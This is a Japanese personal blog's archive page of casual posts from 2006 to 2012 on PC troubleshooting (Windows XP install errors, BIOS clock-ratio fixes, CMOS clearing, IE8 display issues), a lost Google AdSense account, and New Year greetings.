  • 2012年10月16日 18:21
  • 戯言

症状:

IE8 で新しいタブで開くと Babylon Search がでる。

Continue reading

Windows XP インストール

  • Posted by: 水瀬
  • 2012年4月12日 10:33
  • 戯言

症状:

「このディスクにはwindows xp互換のパーティションがありません。」

SATAでRAID(HDD2機) + HDD(2機) の環境で実行しましたときのエラーメッセージです。
CD-ROMはIDEで接続しています。

解決方法は簡単でインストールしたい HDD 以外を外すだけでした。

パソコンの電源がON/OFFを繰り返す

  • Posted by: 水瀬
  • 2011年3月10日 01:15
  • 戯言

先日「急にパソコンの電源が落ちて起動しなくなりました」。
正確には「電源を入れても電源がオン・オフを3秒単位くらいで繰り返す」状態に陥りました。

原因は電源が怪しい。

Continue reading

Google AdSense アカウントの非承認 について

  • Posted by: 水瀬
  • 2010年8月17日 07:46
  • 戯言

今から1年前になるのですが、「Google AdSense アカウントの非承認」というタイトルでメールが届きました。
取り敢えずガイドラインに沿って「無効なアカウントについての申し立て」を行いました。
自動返信で2週間ほど処理に時間がかかるということでした。
その後Google側からの応答はありませんでした。
結果としてアカウントは復帰しませんでした。

Google側が任意で決定するのでこの時点で復帰は無理と判断して今後の対策をしたほうがいいです。
Google AdSenseはこういうことが結構あるようなので覚悟をしておきましょう。
私の場合は殆ど収益がなかったのでお飾り程度でしたけど、広告タグの修正が大変です。
こういう状況も見越してPHPでインクルードするなどで一括編集できるようにしておくといいでしょう。

P.S. // 2018/04/21 4:20
これが起こってから、かれこれ10年あまりになるのですね...
当方も利用者の為にと、逃げ道(言い訳)を確保しておいて、今更ながらに新たなアフィリエイとを導入しました。
実を結ぶのかは怪しいですが...

Amazonなどで買物をする際には、当HPのリンクから(どれでも可)行かれて、検索などで目的の商品を買って貰えると運営費の足しになります。

CPU Clock Ratio 設定が正しく反映しない

  • Posted by: 水瀬
  • 2010年8月16日 06:55
  • 戯言

GIGABYTE 965P-DS3 rev.1

動作が遅くなったと感じながら数日経過した頃に起動時のCPUクロックが1.6GHzになっていることに気づきました。
正しくは2.4GHzになっていなければいけないところです。
早速BIOSで確認するとCPU Clock Ratioが6xになっていました。
ここも正しくは9xになるところです。
ですが、9xに設定しても再起動で6xに戻ってしまいます。

取り敢えずBIOSの更新を行いました。
GIGABYTEのホームページから@BIOSというツールをダウンロード。
同じくホームページからマザーボードのBIOSのファイルをダウンロード。
バージョンはF3からF14に更新することになりました。

@BIOSをインストール後、ファイルからアップデートを行いました。
ダウンロードしたBIOSファイルを展開するとその中に*.f14というファイルがあったと思うのでそれを選択してしばらく待つとアップデート完了です。
再起動を促されるので、再起動して終了です。

再起動のついでにBIOSでCPU Clock Ratioを確認、やっぱり6xのままでした。
取り敢えず9xにして再起動しましたが、6xに戻ってしまっています。

急にこの症状になったので、原因は本当に不明です。
最終手段としてCMOSクリアを行いました。

取り敢えずマザーボードの電池を抜いてしばらく放置。
その後、電池を戻して電源をいれました。
結果から言うとこれで症状が改善しました。
取り敢えず必要なBIOS設定をおこなってWindowsを起動しました。

現在は改善しましたが、原因が解らない以上完全な解決にはなっていないので不安要素は残ります。

※BIOSのアップデートは場合によっては再起不能になる可能性もあるので自己責任で行って下さい。

あけましておめでとうございます

  • Posted by: 水瀬
  • 2010年1月 3日 08:56
  • 戯言

皆様のご健康とご多幸をお祈りいたしております。
本年も FYA ともどもよろしくお願いします。

水瀬

CMOSクリアでOSが起動しなくなった

  • Posted by: 水瀬
  • 2009年5月30日 19:07
  • 戯言

先日オーバークロック(OC)をしてみたところちょっとした不都合が発生。
BIOSでOC設定を施しての初回起動時はOSが起動するものの再起動を行ったところで異状を知らせるビープ音とともにBIOSもOSも起動不可能になりました。

Continue reading

IE8 互換表示について

  • Posted by: 水瀬
  • 2009年5月27日 19:58
  • 戯言

Internet Explorer(以下IE) 8の新機能として互換表示があります。
これはIE8でデザインが壊れるなどの問題が起きる時に用いることで改善をはかる機能です。

しかし訪れたユーザーに互換表示へ切り替えてもらうので好ましいとは言えません。
もちろんホームページをIE8に対応させることが出来ればそれが一番です。
直ぐに改善できない場合などで一時的に自動で互換表示させる方法があります。

Continue reading

謹賀新年

  • Posted by: 水瀬
  • 2009年1月 1日 00:00
  • 戯言

FYAが新年を迎えられました。
皆様も健やかな新年を迎えられたことと願っています。

昨年はFYAをご訪問、ご利用頂き誠にありがとうございます。
どうか本年もよろしくお願いします。

本年も皆様の繁栄をお祈り申し上げます。

2009年 元旦

不甲斐ない管理人ではありますが、皆様のご理解・ご協力をお願いします。

水瀬

謹賀新年

  • Posted by: 水瀬
  • 2008年1月 1日 14:25
  • 戯言

FYAが新春を迎えられました。
皆様の健やかな新春を迎えられたことと願っています。

昨年はFYAをご訪問頂き、誠にありがとうございます。
どうか本年もよろしくお願いします。

本年も皆様の繁栄をお祈り申し上げます。

2008年 元旦

不甲斐ない管理人ではありますが、皆様のご理解・ご協力をお願いします。

水瀬

ブラウザ

  • Posted by: 水瀬
  • 2007年2月11日 11:42
  • 戯言

Internet Explorer (以下IE)

私の環境では IE7 がインストールされています。今までは、IE6 の表示確認を他の人にお願いしていました。お願いするまでは、まさか同じ IE で表示が異なるなんて考えませんでした。

Continue reading

明けまして、おめでとうございます

  • Posted by: 水瀬
  • 2007年1月 2日 03:44
  • 戯言

明けまして、おめでとうございます。
今年も FYA を宜しくお願いします。

サイトデザイン

  • Posted by: 水瀬
  • 2006年12月12日 00:30
  • 戯言

FYAのホームページを見直していました。

Continue reading

アクセス解析

  • Posted by: 水瀬
  • 2006年12月10日 06:41
  • 戯言

みなさんはアクセス解析にご興味を抱いたことはありませんか?
ない?・・・はいわかりました。でも既に数秒前からご興味を抱かれたことにします。

アクセス解析はサイト運営者にとっては大きな情報になります。今後の運営にも十分なヒントになるので是非とも導入してみてくださいね。レンタルを使うとデザインに影響もでちゃうので、その点でも有利?

Continue reading

Index of all entries

Home > 戯言 Archive

Search
Feeds

Return to page top